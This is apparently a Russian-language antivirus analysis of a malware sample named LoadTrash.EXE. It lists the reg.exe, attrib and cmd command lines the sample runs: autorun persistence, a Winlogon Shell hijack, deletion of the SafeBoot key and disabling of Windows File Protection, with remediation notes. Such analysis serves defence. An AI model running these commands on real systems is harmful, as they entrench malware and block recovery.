Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] 'Shell' = 'Explorer LoadTrash.EXE'
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Loader...' = '<SYSTEM32>\LoadTrash.EXE'
- Изменяет настройку отображения расширений файлов в Проводнике (параметр HideFileExt, см. команду reg.exe ниже)
- <SYSTEM32>\reg.exe ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Loader..." /T REG_SZ /D "<SYSTEM32>\LoadTrash.EXE" /F
- <SYSTEM32>\reg.exe ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /V "HideFileExt" /T REG_DWORD /D 00000000 /F
- <SYSTEM32>\reg.exe ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "Shell" /T REG_SZ /D "Explorer LoadTrash.EXE" /F
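- <SYSTEM32>\reg.exe DELETE "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot" /F
  (примечание: удаление ключа SafeBoot делает невозможной загрузку системы в безопасном режиме, что затрудняет лечение; при восстановлении ключ нужно вернуть из резервной копии или с эталонной системы)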
- <SYSTEM32>\attrib.exe +R +A +S +H "%ALLUSERSPROFILE%\Start Menu\Programs\Startup\LoadTrash.EXE"
- <SYSTEM32>\label.exe /MP C: PC!
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\LoadTrash.BAT" "
- <SYSTEM32>\rundll32.exe shell32.dll,Activate_RunDLL
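- <SYSTEM32>\reg.exe ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "SFCDisable" /T REG_DWORD /D "ffffff9d" /F
- <SYSTEM32>\reg.exe ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "SFCSetting" /T REG_DWORD /D "ffffff9d" /F
  (примечание: параметры SFCDisable и SFCSetting относятся к защите системных файлов Windows (Windows File Protection); запись значения ffffff9d, по-видимому, направлена на её отключение — при проверке системы стоит сверить эти параметры со значениями по умолчанию)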
- %TEMP%\1.tmp\LoadTrash.BAT